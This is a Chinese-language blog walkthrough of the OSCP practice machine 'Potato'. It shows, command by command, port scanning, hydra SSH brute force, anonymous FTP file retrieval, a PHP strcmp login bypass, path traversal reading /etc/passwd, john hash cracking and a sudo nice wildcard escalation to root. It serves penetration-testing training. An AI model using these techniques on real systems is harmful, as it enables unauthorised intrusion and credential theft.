freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

从WEB到内网&&代码审计&&strcmp绕过&&sudo提权 ----- 打靶经验分享
2023-09-02 23:10:51

OSCP靶机-------Potato

今天来打一个OSCP的靶机,难度中等偏高,包含了端口探测,服务探测,ssh爆破,ftp匿名登录,前端代码审计,strcmp登录绕过,john爆破,sudo提权等等…靶场难度中等偏高,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
image.png
攻击机IP为:192.168.45.173
启动靶机:
image.png
靶机IP为:192.168.215.101

信息收集

1.端口

nmap扫描端口
nmap --min-rate 10000 -p- 192.168.215.101
可以看到靶机开放三个端口;
image.png
22 ssh
80 http
2112 kip
端口服务探测:
nmap -p 22,80,2112 -sV 192.168.215.101
探测到各端口对应服务为:
image.png

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
2112/tcp open ftp ProFTPD

2.端口测试

2.122-SSH端口
发现开启的22是ssh端口,且版本为 OpenSSH 8.2p1 Ubuntu,搜一下有没有对应的脚本:
searchsploit OpenSSH 8.2
image.png
没有就试试手工弱口令:
ssh root@192.168.215.101 -p 22
image.png
还是以失败告终,直接上ssh爆破,字典用msf,线程为6:
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.215.101 ssh -s 22
等待......
image.png
肯定是没有的,下一步。
2.280-http
访问一下80端口:
192.168.215.101:80
image.png
一个性感的土豆(狗头),啥都没有,不像有CMS的样子,扫一下目录看看。
dirsearch -u http://192.168.215.101/

有admin看一下:
image.png
登录框,可以试一下万能密码和弱口令。
admin' or '1'='1
啥口令都登不上去
image.png
看一下/admin/logs/,有一个目录。
image.png
image.png
没什么有用的信息,知道了用户是admin。
还有个/index.php/login/
image.png
土豆加载不出来,也没什么东西。
2.32112 ftp
2112端口是ftp服务,而且版本是 ProFTPD。先手工登录一下:
ftp 192.168.215.101 -p 2112
image.png
用匿名用户anonymous登一下
image.png
允许匿名用户登录。收集一下有什么信息:
image.png

binary  #二进制传输确保完整性
ls   #列出当前目录
get index.php.bak
get welcome.msg   #下载这两个文件

image.png
看一下下载到的两个文件:
image.png
啥也没有。
image.png
是一个登录页面的html代码。

攻击阶段

image.png
这里看到post传参的值是admin,和前面80端口收集到用户名一样。还有这里是一个strcmp函数,这个函数在进行对比,如果相同返回0不相同返回非0。它是一个PHP弱类型,这个函数比较的是字符串类型,如果强行传入其他参数就会出错,出错后返回0,返回0就可以绕过直接登录了。
理论成型,直接开干。
burp先抓个登录包。
image.png
既然strcmp比较的是字符串类型,那就把密码变成数组且等于1传过去,这样应该就会出错。
image.png
发包
image.png
成功登录,开心。
image.png
看到PING,还以为能有命令执行,结果不是。好像只有log能够跳转新站点。
image.png
get the log是一个文件读取的功能,抓包看看能不能用目录穿越读取别的东西。
image.png
这个POST传参是可以修改的,试一下目录穿越直接读取passwd。
../../../../../etc/passwd
image.png
发包,成功读取到了psswd
image.png
读到了webadmin用户的加密密码,尝试一下爆破解密。将密码存到文件中:
echo '$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/' → passwd.hash
利用john爆破
john passwd.hash
image.png
爆破出密码为dragon,直接ssh登录:
ssh webadmin@192.168.215.101 -p 22
image.png
成功拿到shell

内网渗透

获取flag1:
find / -name local.txt
cat /home/webadmin/local.txt
image.png

提权

1.内核overlayfs提权
lsb_release -a看看发行版本
image.png
20.04 不行
2.低内核版本提权
uname -a
image.png
5.4.0-42 不行
3.Cron job提权
cat /etc/crontab
查找定时任务。没有
image.png

4.sudo提权
sudo -l
image.png
有东西:

(ALL : ALL) /bin/nice /notes/*
去https://gtfobins.github.io找提权方式:
搜索nice
image.png
在/notes/文件下任意内容都可以sudo执行nice
去一个可执行目录:

cd /tmp
echo '/bin/sh -p' > shell   #写入shell
cat shell     #查看shell
chmod +x shell    #给shell加权限

image.png
利用目录穿越绕过sudo的限制
sudo /bin/nice /notes/../../tmp/shell
image.png
成功提权。
获取flag2:
cat /root/proof.txt
image.png
image.png
完结。

# 漏洞 # 渗透测试 # 网络安全 # web安全 # 内网渗透
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录